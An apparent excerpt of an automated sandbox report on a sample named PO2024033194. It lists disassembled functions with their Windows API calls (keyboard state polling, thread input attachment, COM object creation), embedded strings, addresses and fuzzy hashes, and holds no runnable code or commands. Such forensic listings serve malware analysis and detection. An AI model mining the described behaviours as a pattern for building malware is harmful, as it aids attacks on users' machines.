                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorMode$DriveType
                                                                  • String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$\VH
                                                                  • API String ID: 2907320926-3566645568
                                                                  • Opcode ID: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                                                  • Instruction ID: 8c6a7395db7573f60177d60b7e789de744ab79b943898383e565048f237880a7
                                                                  • Opcode Fuzzy Hash: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                                                  • Instruction Fuzzy Hash: B7316E35A042049BCB10FFA9C48595EB771FF88315B1088ABFD05AB392C739DD45CB6A
                                                                  APIs
                                                                    • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                                                  • DestroyAcceleratorTable.USER32(?), ref: 0047094A
                                                                  • ImageList_Destroy.COMCTL32(?), ref: 004709AD
                                                                  • ImageList_Destroy.COMCTL32(?), ref: 004709C5
                                                                  • ImageList_Destroy.COMCTL32(?), ref: 004709D5
                                                                  • DeleteObject.GDI32(003D0000), ref: 00470A04
                                                                  • DestroyIcon.USER32(003A0043), ref: 00470A1C
                                                                  • DeleteObject.GDI32(AB306519), ref: 00470A34
                                                                  • DestroyWindow.USER32(006C0061), ref: 00470A4C
                                                                  • DestroyIcon.USER32(?), ref: 00470A73
                                                                  • DestroyIcon.USER32(?), ref: 00470A81
                                                                  • KillTimer.USER32(00000000,00000000), ref: 00470B00
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateKillRectTableTimerWindow
                                                                  • String ID:
                                                                  • API String ID: 1237572874-0
                                                                  • Opcode ID: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                                                  • Instruction ID: 3938066daea6daae9dc0c39577387909b3bcb8112bd91d3310d64c2ecda3814a
                                                                  • Opcode Fuzzy Hash: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                                                  • Instruction Fuzzy Hash: 24616874601201CFE714DF65DD94FAA77B8FB6A304B54856EE6098B3A2CB38EC41CB58
                                                                  APIs
                                                                  • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,004795FD), ref: 00479380
                                                                  • SafeArrayAllocData.OLEAUT32(004795FD), ref: 004793CF
                                                                  • VariantInit.OLEAUT32(?), ref: 004793E1
                                                                  • SafeArrayAccessData.OLEAUT32(004795FD,?), ref: 00479402
                                                                  • VariantCopy.OLEAUT32(?,?), ref: 00479461
                                                                  • SafeArrayUnaccessData.OLEAUT32(004795FD), ref: 00479474
                                                                  • VariantClear.OLEAUT32(?), ref: 00479489
                                                                  • SafeArrayDestroyData.OLEAUT32(004795FD), ref: 004794AE
                                                                  • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794B8
                                                                  • VariantClear.OLEAUT32(?), ref: 004794CA
                                                                  • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794E7
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                  • String ID:
                                                                  • API String ID: 2706829360-0
                                                                  • Opcode ID: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                                                                  • Instruction ID: 8c269571b42c1441f814514f03b92edd351012a73d8239c9f379a0a89e1b4ae1
                                                                  • Opcode Fuzzy Hash: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                                                                  • Instruction Fuzzy Hash: F6515E76A00119ABCB00DFA5DD849DEB7B9FF88704F10856EE905A7241DB749E06CBA4
                                                                  APIs
                                                                  • GetKeyboardState.USER32(?), ref: 0044480E
                                                                  • GetAsyncKeyState.USER32(000000A0), ref: 00444899
                                                                  • GetKeyState.USER32(000000A0), ref: 004448AA
                                                                  • GetAsyncKeyState.USER32(000000A1), ref: 004448C8
                                                                  • GetKeyState.USER32(000000A1), ref: 004448D9
                                                                  • GetAsyncKeyState.USER32(00000011), ref: 004448F5
                                                                  • GetKeyState.USER32(00000011), ref: 00444903
                                                                  • GetAsyncKeyState.USER32(00000012), ref: 0044491F
                                                                  • GetKeyState.USER32(00000012), ref: 0044492D
                                                                  • GetAsyncKeyState.USER32(0000005B), ref: 00444949
                                                                  • GetKeyState.USER32(0000005B), ref: 00444958
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: State$Async$Keyboard
                                                                  • String ID:
                                                                  • API String ID: 541375521-0
                                                                  • Opcode ID: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                                                  • Instruction ID: 827c2ee343902556a703916e37c968ecd50c133e95067caf6822082f003788d3
                                                                  • Opcode Fuzzy Hash: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                                                  • Instruction Fuzzy Hash: 27412B34A047C969FF31A6A4C8043A7BBA16FA1314F04805FD5C5477C1DBED99C8C7A9
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: InitVariant$_malloc_wcscpy_wcslen
                                                                  • String ID:
                                                                  • API String ID: 3413494760-0
                                                                  • Opcode ID: b3fce9f732112990bbb163bb6abadbd830b92813f31b22ad1e38064008f16c53
                                                                  • Instruction ID: 93a03e1dde4748921c3f7e50244c45dc9774a8ad470eaa8d68eb3f4e8808ad8d
                                                                  • Opcode Fuzzy Hash: b3fce9f732112990bbb163bb6abadbd830b92813f31b22ad1e38064008f16c53
                                                                  • Instruction Fuzzy Hash: 33414BB260070AAFC754DF69C880A86BBE8FF48314F00862AE619C7750D775E564CBE5
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc_free_malloc$_strcat_strlen
                                                                  • String ID: AU3_FreeVar
                                                                  • API String ID: 2634073740-771828931
                                                                  • Opcode ID: b7b62cf44ead268743cea15c23fa0702c80810b5d7796ec40f0430e9877b9643
                                                                  • Instruction ID: 8d08e60933d1045585c44e473594da8d0bbfd8a8652ecee4fcef853dc29158a1
                                                                  • Opcode Fuzzy Hash: b7b62cf44ead268743cea15c23fa0702c80810b5d7796ec40f0430e9877b9643
                                                                  • Instruction Fuzzy Hash: 00B1ADB4A00206DFCB00DF55C880A6AB7A5FF88319F2485AEED058F352D739ED95CB94
                                                                  APIs
                                                                  • CoInitialize.OLE32 ref: 0046C63A
                                                                  • CoUninitialize.OLE32 ref: 0046C645
                                                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                    • Part of subcall function 0044CB87: CreateDispTypeInfo.OLEAUT32(?,00000800,?), ref: 0044CBD4
                                                                    • Part of subcall function 0044CB87: CreateStdDispatch.OLEAUT32(00000000,?,?,?), ref: 0044CBF4
                                                                  • CLSIDFromProgID.OLE32(00000000,?), ref: 0046C694
                                                                  • CLSIDFromString.OLE32(00000000,?), ref: 0046C6A4
                                                                  • CoCreateInstance.OLE32(?,00000000,00000017,00482998,?), ref: 0046C6CD
                                                                  • IIDFromString.OLE32(?,?), ref: 0046C705
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: CreateFrom$String$DispDispatchInfoInitializeInstanceProgTypeUninitialize_malloc
                                                                  • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                  • API String ID: 2294789929-1287834457
                                                                  • Opcode ID: 4dfaed0549f409efa28524cf643488acd2e6b782f2d71f2a42dfc1cbbaa944b5
                                                                  • Instruction ID: adb6a6f601bf1a612e569d1fac1689f55b30b767fcafa950e0578031a668eb85
                                                                  • Opcode Fuzzy Hash: 4dfaed0549f409efa28524cf643488acd2e6b782f2d71f2a42dfc1cbbaa944b5
                                                                  • Instruction Fuzzy Hash: B861BC712043019FD710EF21D885B7BB3E8FB84715F10891EF9859B241E779E909CBAA
                                                                  APIs
                                                                    • Part of subcall function 00456391: GetCursorPos.USER32(?), ref: 004563A6
                                                                    • Part of subcall function 00456391: ScreenToClient.USER32(?,?), ref: 004563C3
                                                                    • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456400
                                                                    • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456410
                                                                  • DefDlgProcW.USER32(?,00000205,?,?), ref: 00471145
                                                                  • ImageList_DragLeave.COMCTL32(00000000), ref: 00471163
                                                                  • ImageList_EndDrag.COMCTL32 ref: 00471169
                                                                  • ReleaseCapture.USER32 ref: 0047116F
                                                                  • SetWindowTextW.USER32(?,00000000), ref: 00471206
                                                                  • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00471216
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
                                                                  • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                  • API String ID: 2483343779-2107944366
                                                                  • Opcode ID: 0c0f1ff16893fa866466cf5bd33a163e2c592d09522a7afef5934b76f638d362
                                                                  • Instruction ID: f70d9246110d4513cc5ea0640624bfdb04bec8758509bedf4130776013c57ff9
                                                                  • Opcode Fuzzy Hash: 0c0f1ff16893fa866466cf5bd33a163e2c592d09522a7afef5934b76f638d362
                                                                  • Instruction Fuzzy Hash: D751E5706002109FD700EF59CC85BAF77A5FB89310F004A6EF945A72E2DB789D45CBAA
                                                                  APIs
                                                                  • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004506A0
                                                                  • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 004506B4
                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004506D5
                                                                  • _wcslen.LIBCMT ref: 00450720
                                                                  • _wcscat.LIBCMT ref: 00450733
                                                                  • SendMessageW.USER32(?,00001057,00000000,?), ref: 0045074C
                                                                  • SendMessageW.USER32(?,00001061,?,?), ref: 0045077E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Window_wcscat_wcslen
                                                                  • String ID: -----$SysListView32
                                                                  • API String ID: 4008455318-3975388722
                                                                  • Opcode ID: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                                                  • Instruction ID: d83f74bd31ff7b91e94eebeff09b40632409ca0fd113a8de7250d6f1aa6a1b31
                                                                  • Opcode Fuzzy Hash: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                                                  • Instruction Fuzzy Hash: 9C51D470500308ABDB24CF64CD89FEE77A5EF98304F10065EF944A72C2D3B99959CB58
                                                                  APIs
                                                                    • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                    • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                  • SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469C73
                                                                  • GetDlgCtrlID.USER32(00000000), ref: 00469C84
                                                                  • GetParent.USER32 ref: 00469C98
                                                                  • SendMessageW.USER32(00000000,?,00000111), ref: 00469C9F
                                                                  • GetDlgCtrlID.USER32(00000000), ref: 00469CA5
                                                                  • GetParent.USER32 ref: 00469CBC
                                                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 00469CC3
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$CtrlParent$_memmove_wcslen
                                                                  • String ID: ComboBox$ListBox
                                                                  • API String ID: 2360848162-1403004172
                                                                  • Opcode ID: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                                                  • Instruction ID: b77daa4920d68b7dc7b38413de7e2b04daab878370679d8231203fb1b5b646ea
                                                                  • Opcode Fuzzy Hash: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                                                  • Instruction Fuzzy Hash: 0121E7716001187BDB00AB69CC85ABF779CEB85320F00855BFA149B2D1D6B8D845C7A5
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: _wcscpy$FolderUninitialize$BrowseDesktopFromInitializeListMallocPath
                                                                  • String ID:
                                                                  • API String ID: 262282135-0
                                                                  • Opcode ID: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                                                  • Instruction ID: f209a7e015878e5ef66622a864ec89938c936514b9877fb167e893f071c19078
                                                                  • Opcode Fuzzy Hash: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                                                  • Instruction Fuzzy Hash: 25718275900208AFCB14EF95C9849DEB7B9EF88304F00899AE9099B312D735EE45CF64
                                                                  APIs
                                                                  • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004481A8
                                                                  • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004481AB
                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 004481CF
                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481F2
                                                                  • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00448266
                                                                  • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482B4
                                                                  • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482CF
                                                                  • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482F1
                                                                  • SendMessageW.USER32(?,0000101E,00000001,?), ref: 00448308
                                                                  • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448320
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$LongWindow
                                                                  • String ID:
                                                                  • API String ID: 312131281-0
                                                                  • Opcode ID: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                                                  • Instruction ID: c7c5d5d6f9bf0949bb943eac7ac5a8ec30049dd2ce11923e35461b50cec8bdb0
                                                                  • Opcode Fuzzy Hash: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                                                  • Instruction Fuzzy Hash: 97617C70A00208AFEB10DF94DC81FEE77B9FF49714F10429AF914AB291DBB5AA41CB54
                                                                  APIs
                                                                    • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
                                                                  • SendMessageW.USER32(769523D0,00001001,00000000,?), ref: 00448E16
                                                                  • SendMessageW.USER32(769523D0,00001026,00000000,?), ref: 00448E25
                                                                    • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$BrushCreateDeleteObjectSolid
                                                                  • String ID:
                                                                  • API String ID: 3771399671-0
                                                                  • Opcode ID: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                                                  • Instruction ID: 7c26134f999fedcb31daf2d1c178305a5bad5d5d588b7e0560cc3c70a69cf84e
                                                                  • Opcode Fuzzy Hash: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                                                  • Instruction Fuzzy Hash: C7511570300214ABF720DF24DC85FAE77A9EF14724F10491EFA59AB291CB79E9498B18
                                                                  APIs
                                                                  • GetCurrentThreadId.KERNEL32 ref: 00434643
                                                                  • GetForegroundWindow.USER32(00000000), ref: 00434655
                                                                  • GetWindowThreadProcessId.USER32(00000000), ref: 0043465C
                                                                  • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434671
                                                                  • GetWindowThreadProcessId.USER32(?,?), ref: 0043467F
                                                                  • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434698
                                                                  • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004346A6
                                                                  • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004346F3
                                                                  • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434707
                                                                  • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434712
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                  • String ID:
                                                                  • API String ID: 2156557900-0
                                                                  • Opcode ID: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                                                  • Instruction ID: 33c2ceff45d8cb0672f592c0823183733d26e7ad7419b63083ab10cfbc882f35
                                                                  • Opcode Fuzzy Hash: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                                                  • Instruction Fuzzy Hash: 98313EB2600204BFDB11DF69DC859AEB7A9FB9A310F00552AF905D7250E778AD40CB6C
